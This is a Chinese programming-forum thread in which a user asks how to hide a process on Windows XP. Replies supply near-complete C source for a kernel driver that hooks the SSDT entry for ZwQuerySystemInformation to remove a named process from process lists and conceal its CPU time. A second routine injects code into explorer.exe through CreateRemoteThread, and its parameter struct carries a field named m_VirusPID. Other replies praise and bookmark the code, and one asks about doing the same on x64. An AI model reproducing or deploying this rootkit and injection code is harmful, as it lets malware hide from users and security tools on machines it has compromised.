15,471
社区成员
发帖
与我相关
我的任务
分享如何隐藏进程
请看:
typedef DWORD (CALLBACK* LPR)(DWORD,DWORD);
HINSTANCE hDLL;
LPR lpRegisterServiceProcess;
hDLL = LoadLibrary("kernel32.dll");
lpRegisterServiceProcess = (LPR)GetProcAddress(hDLL,"RegisterServiceProcess");
if(lpRegisterServiceProcess)
lpRegisterServiceProcess(GetCurrentProcessId(),1);
但据说这个代码必须在win98下运行,可是我的系统是XP,请问:该怎么隐藏进程?
typedef DWORD (CALLBACK* LPR)(DWORD,DWORD);
HINSTANCE hDLL;
LPR lpRegisterServiceProcess;
hDLL = LoadLibrary("kernel32.dll");
lpRegisterServiceProcess = (LPR)GetProcAddress(hDLL,"RegisterServiceProcess");
if(lpRegisterServiceProcess)
lpRegisterServiceProcess(GetCurrentProcessId(),1);
但据说这个代码必须在win98下运行,可是我的系统是XP,请问:该怎么隐藏进程?
...全文
请发表友善的回复…
发表回复
hanyang4141 2012-07-31
- 打赏
- 举报
阅读回复看内容喽
billandmary 2011-05-18
- 打赏
- 举报
阅读回复看内容喽
assicen 2009-11-08
- 打赏
- 举报
5楼的同学一看以前就有在别人的机器里玩过藏猫猫 哈哈
CodeProject-Jerry 2009-11-07
- 打赏
- 举报
[Quote=引用 12 楼 tr0j4n 的回复:]
C/C++ code
HANDLE MyCreateRemoteThread(LPSTR ctname,LPSTR ckname)
{
HANDLE RemoteThreadHandle;
HANDLE RemoteProcessHandle;char Name[2][15];//used for the name of remote process PWSTR RemoteThreadAddress;
...
[/Quote]
x64 怎么办哦? 我一直没成功过,
SSDT改不了 Shadow也改不了
每个线程的SSDT拷贝也找不到,64位汇编看得头好晕啊,基本功不好
有么子简单方法没? 不要破解patchguard
C/C++ code
HANDLE MyCreateRemoteThread(LPSTR ctname,LPSTR ckname)
{
HANDLE RemoteThreadHandle;
HANDLE RemoteProcessHandle;char Name[2][15];//used for the name of remote process PWSTR RemoteThreadAddress;
...
[/Quote]
x64 怎么办哦? 我一直没成功过,
SSDT改不了 Shadow也改不了
每个线程的SSDT拷贝也找不到,64位汇编看得头好晕啊,基本功不好
有么子简单方法没? 不要破解patchguard
guangmingdeshenju 2009-11-07
- 打赏
- 举报
深奥哦
哈利路亚1874 2009-11-07
- 打赏
- 举报
楼上贴出的代码真是值得学习,虽然知道一些隐藏进程的原理,但还没去做过,先收藏,再学习!
zCheng 2009-11-07
- 打赏
- 举报
这个驱动绝对值得收藏!
稍微问一下,ring3 的 Hook 如何实现呢?
稍微问一下,ring3 的 Hook 如何实现呢?
lzb112 2009-11-02
- 打赏
- 举报
这驱动绝对要收藏!!
jamseyang 2009-10-19
- 打赏
- 举报
驱动很好,很强大,开始学习~
winvxd 2009-10-18
- 打赏
- 举报
ring3 hook或者ring0 hook都可以达到目的。
Tracy98534 2009-10-15
- 打赏
- 举报
好好学习一下
曾经的董胖 2009-09-15
- 打赏
- 举报
收藏
jamseyang 2009-09-15
- 打赏
- 举报
CreateRemoteThread可以实现的而且又简单~,楼主可以试试哦
MoXiaoRab 2009-09-15
- 打赏
- 举报
HANDLE MyCreateRemoteThread(LPSTR ctname,LPSTR ckname)
{
HANDLE RemoteThreadHandle;
HANDLE RemoteProcessHandle;
char Name[2][15]; //used for the name of remote process
PWSTR RemoteThreadAddress;
PWSTR RemoteParameterAddress;
DWORD RemotePID=0;
int cb;
int signal;
HINSTANCE H_Kernel32;
REMOTEPARAMETER RemoteParameter;
HANDLE h;
//get the handle of Explorer.exe or Taskmgr.exe
strcpy(Name[0],"explorer.exe");
strcpy(Name[1],"taskmgr.exe");
signal=1;
EnableDebugPriv();
char NormalName[MAX_PATH]="UnknownProcess";
h=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe={sizeof(pe)};
BOOL fok=Process32First(h,&pe);
for(;fok;fok=::Process32Next(h,&pe))
{
strcpy(NormalName,pe.szExeFile);
if(!stricmp(NormalName,"Explorer.exe") )
{
RemotePID=pe.th32ProcessID;
// char t[256]="";
// sprintf(t,"%d",RemotePID);
// ::AfxMessageBox(t);
break;
}
}
while(1)
{
RemoteProcessHandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,RemotePID);
if(RemoteProcessHandle==NULL)
{
Sleep(1000);
}
else
{
//::AfxMessageBox("success in get handle");
break;
}
}
EnableDebugPriv();
//write the function to the handle
cb=sizeof(char)*32*1024;
RemoteThreadAddress=(PWSTR)VirtualAllocEx(RemoteProcessHandle,NULL,
cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(RemoteThreadAddress==NULL)
{
::AfxMessageBox("fail to hand over the memory for funciton");
CloseHandle(RemoteProcessHandle);
return NULL;
}
if(WriteProcessMemory(RemoteProcessHandle,RemoteThreadAddress,
(LPVOID)RemoteThreadFunction,cb,NULL)==FALSE)
{
::AfxMessageBox("fail to write the memory for funciton");
CloseHandle(RemoteProcessHandle);
return NULL;
}
//write the parameter
memset(&RemoteParameter,0,sizeof(RemoteParameter));
RemoteParameter.m_VirusPID=GetCurrentProcessId();
strcpy(RemoteParameter.m_SourceFileName,ctname);
strcpy(RemoteParameter.m_BackupFileName,ckname);
strcpy(RemoteParameter.m_MessageBox,"Message");
strcpy(RemoteParameter.m_MessageBox1,"here1");
strcpy(RemoteParameter.m_MessageBox2,"here2");
strcpy(RemoteParameter.m_MessageBox3,"here3");
// WideCharToMultiByte(CP_ACP,0,ctname,-1,RemoteParameter.m_WinExecFileName,
// _tcslen(ctname),NULL,NULL);
strcpy(RemoteParameter.m_WinExecFileName,ctname);
H_Kernel32=GetModuleHandle(_T("kernel32.dll"));
RemoteParameter.fp_OpenProcess=(DWORD)GetProcAddress(H_Kernel32,"OpenProcess");
RemoteParameter.fp_WaitForSingleObject=(DWORD)GetProcAddress(H_Kernel32,"WaitForSingleObject");
RemoteParameter.fp_FindFirstFile=(DWORD)GetProcAddress(H_Kernel32,"FindFirstFileA");
RemoteParameter.fp_CopyFile=(DWORD)GetProcAddress(H_Kernel32,"CopyFileA");
RemoteParameter.fp_FindClose=(DWORD)GetProcAddress(H_Kernel32,"FindClose");
RemoteParameter.fp_WinExec=(DWORD)GetProcAddress(H_Kernel32,"WinExec");
HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
RemoteParameter.fp_MessageBox=(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
cb=sizeof(char)*sizeof(RemoteParameter)*1;
RemoteParameterAddress=(PWSTR)VirtualAllocEx(RemoteProcessHandle,NULL,cb,
MEM_COMMIT,PAGE_READWRITE);
if(RemoteParameterAddress==NULL)
{
::AfxMessageBox("fail to hand over the memory for parameter");
CloseHandle(RemoteProcessHandle);
return NULL;
}
if(WriteProcessMemory(RemoteProcessHandle,RemoteParameterAddress,
(LPVOID)&RemoteParameter,cb,NULL)==FALSE)
{
::AfxMessageBox("fail to write the memory for parameter");
CloseHandle(RemoteProcessHandle);
return NULL;
}
RemoteThreadHandle=CreateRemoteThread(RemoteProcessHandle,NULL,0,
(LPTHREAD_START_ROUTINE)RemoteThreadAddress,
(LPVOID)RemoteParameterAddress,0,NULL);
if(RemoteThreadHandle==NULL)
{
::AfxMessageBox("fail to create remote thread");
CloseHandle(RemoteProcessHandle);
return NULL;
}
CloseHandle(h);
return RemoteThreadHandle;
}
leetow2003 2009-09-15
- 打赏
- 举报
CreateRemoteThread可以实现的而且又简单~:怎么做呢?
roman_v 2009-09-14
- 打赏
- 举报
学习了~~
老邓 2009-09-14
- 打赏
- 举报
这个驱动要收藏!
MoXiaoRab 2009-09-14
- 打赏
- 举报
使用方法,从DeviceIoControl传入
#define IOCTL_FUCK CTL_CODE(\
FILE_DEVICE_UNKNOWN, \
0x800, \
METHOD_BUFFERED, \
FILE_ANY_ACCESS)
然后缓冲区放入你的进程名称即可
#define IOCTL_FUCK CTL_CODE(\
FILE_DEVICE_UNKNOWN, \
0x800, \
METHOD_BUFFERED, \
FILE_ANY_ACCESS)
然后缓冲区放入你的进程名称即可
MoXiaoRab 2009-09-14
- 打赏
- 举报
VOID DriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT pNextObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING pLinkName;
DbgPrint("DriverUnload!\n");
UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
if(g_pmdlSystemCall)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
pNextObj=pDriverObject->DeviceObject;
while(pNextObj!=NULL)
{
pDevExt=(PDEVICE_EXTENSION)pNextObj->DeviceExtension;
pLinkName=pDevExt->ustrSymLinkName;
IoDeleteSymbolicLink(&pLinkName);
pNextObj=pNextObj->NextDevice;
IoDeleteDevice(pDevExt->pDevice);
}
DbgPrint("DriverUnload Complete!\n");
}
NTSTATUS DDKDispatchRoutine(
IN PDEVICE_OBJECT pDeviceObj,
IN PIRP pIrp)
{
NTSTATUS status=STATUS_SUCCESS;
DbgPrint("Enter DDKDispatchRoutine \n");
DbgPrint("Leave DispatchRoutine\n");
return status;
}
NTSTATUS DDKDeviceIoControl(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
NTSTATUS status = STATUS_SUCCESS;
UNICODE_STRING uniStr;
ANSI_STRING aniStr;
PIO_STACK_LOCATION stack;
ULONG cbin,cbout,code,info;
DbgPrint(("Enter DeviceIOControl\n"));
stack = IoGetCurrentIrpStackLocation(pIrp);
cbin = stack->Parameters.DeviceIoControl.InputBufferLength;
cbout = stack->Parameters.DeviceIoControl.OutputBufferLength;
//得到IOCTL码
code = stack->Parameters.DeviceIoControl.IoControlCode;
info = cbout;
switch (code)
{ // process request
case IOCTL_FUCK:
{
DbgPrint(" IOCTL_FUCK\n");
//缓冲区方式IOCTL
//显示输入缓冲区数据
InputBuffer = (UCHAR *)pIrp->AssociatedIrp.SystemBuffer;
DbgPrint("length is %d %d\n",cbin,cbout);
DbgPrint("The input buffer is %s\n",InputBuffer);
RtlInitAnsiString(&aniStr,InputBuffer);
RtlAnsiStringToUnicodeString(&uniStr,&aniStr,TRUE);
ProName=uniStr.Buffer;
//操作输出缓冲区
//设置实际操作输出缓冲区长度
info = cbout;
break;
}
default:
status = STATUS_INVALID_VARIANT;
}
// 完成IRP
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = info;
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
return status;
}
#pragma INITCODE
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status;
pDriverObject->DriverUnload=DriverUnload;
DbgPrint("DriverEntry Started!\n");
status=CreateDevice(pDriverObject);
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=DDKDeviceIoControl;
pDriverObject->MajorFunction[IRP_MJ_CREATE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_READ]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_WRITE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLEANUP]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SET_INFORMATION]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SHUTDOWN]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL]=DDKDispatchRoutine;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
DbgPrint("DriverEntry Ended!\n");
return STATUS_SUCCESS;
}
MoXiaoRab 2009-09-14
- 打赏
- 举报
帮助你下吧,我把我硬盘里的那个代码就吐血奉献出来给你了。
#pragma once
#include <ntddk.h>
#include "drvcommon.h"
#include "drvversion.h"
#define INITCODE code_seg("INIT")
#define IOCTL_FUCK CTL_CODE(\
FILE_DEVICE_UNKNOWN, \
0x800, \
METHOD_BUFFERED, \
FILE_ANY_ACCESS)
typedef struct _DEVICE_EXTENSION{
PDEVICE_OBJECT pDevice;
UNICODE_STRING ustrDeviceName;
UNICODE_STRING ustrSymLinkName;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
UCHAR* InputBuffer;
PWSTR ProName;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
_Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};
struct _SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER DpcTime;
LARGE_INTEGER InterruptTime;
ULONG InterruptCount;
};
NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
ULONG SystemInformationCLass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS(ntStatus))
{
if(SystemInformationClass == 5)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
if (curr->ProcessName.Buffer != NULL)
{
if(0 == memcmp(curr->ProcessName.Buffer,ProName, wcslen(ProName)))
{
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
if(prev)
{
if(curr->NextEntryDelta)
prev->NextEntryDelta += curr->NextEntryDelta;
else
prev->NextEntryDelta = 0;
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
SystemInformation = NULL;
}
}
}
else
{
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
else if (SystemInformationClass == 8)
{
struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return ntStatus;
}
NTSTATUS CreateDevice(
IN PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
PDEVICE_OBJECT pDevObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING szDevName,symLinkName;
RtlInitUnicodeString(&szDevName,L"\\Device\\Tr0j4nDevice");
status=IoCreateDevice(pDriverObject,
sizeof(DEVICE_EXTENSION),
&szDevName,
FILE_DEVICE_UNKNOWN,
FILE_DEVICE_SECURE_OPEN,
TRUE,
&pDevObj);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateDevice UnOK!\n");
return status;
}
else
DbgPrint("IoCreateDevice OK!\n");
pDevObj->Flags|=DO_BUFFERED_IO;
pDevExt=(PDEVICE_EXTENSION)pDevObj->DeviceExtension;
pDevExt->pDevice=pDevObj;
pDevExt->ustrDeviceName=szDevName;
RtlInitUnicodeString(&symLinkName,L"\\??\\Tr0j4n");
pDevExt->ustrSymLinkName=symLinkName;
status=IoCreateSymbolicLink(&symLinkName,&szDevName);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateSymbolicLink UnOK");
IoDeleteDevice(pDevObj);
return status;
}
else
DbgPrint("IoCreateSymbolicLink OK");
return STATUS_SUCCESS;
}
加载更多回复(4)
